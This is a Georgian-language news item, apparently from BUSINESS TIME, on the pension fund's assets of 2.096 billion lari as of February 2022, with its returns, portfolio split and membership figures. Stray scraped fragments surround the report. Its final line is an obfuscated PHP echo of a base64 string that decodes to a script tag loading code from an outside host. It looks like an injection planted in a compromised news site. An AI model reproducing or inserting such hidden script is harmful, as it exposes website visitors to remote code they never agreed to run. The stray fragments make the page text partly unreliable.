celsiusi
ავერსი საქკაბელი
2022 წლის 15 თებერვლის მდგომარეობით, მთლიანი საპენსიო აქტივების ღირებულება 2.096 მილიარდი ლარია. 
 
როგორც საინფორმაციო სააგენტო BUSINESS TIME-ს საპენსიო ფონიდან აცნობეს, აქედან, საინვესტიციო საქმიანობის შედეგად დარიცხული სარგებელი 292 მილიონი ლარია. მიმდინარე წლიური მომგებიანობა 11.6%, ხოლო ფონდის გაშვების დღიდან მომგებიანობა 33%-ს შეადგენს. პორთფელის 36% ცვალებად საპროცენტო განაკვეთში (მიმდინარე სარგებლიანი ანგარიშები), ხოლო 64% ფიქსირებულ საპროცენტო განაკვეთში (სადეპოზიტო სერთიფიკატები) 100% ლარში, 9 კომერციულ ბანკშია განთავსებული.
 
საპენსიო სქემაში გაწევრიანებულ მონაწილეთა ოდენობა შეადგენს 1 მილიონ 250 ათას მონაწილეს. დაგროვებითი პენსიით კი, ამ დროისთვის 1,524-მა ადამიანმა ისარგებლა.
1094
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");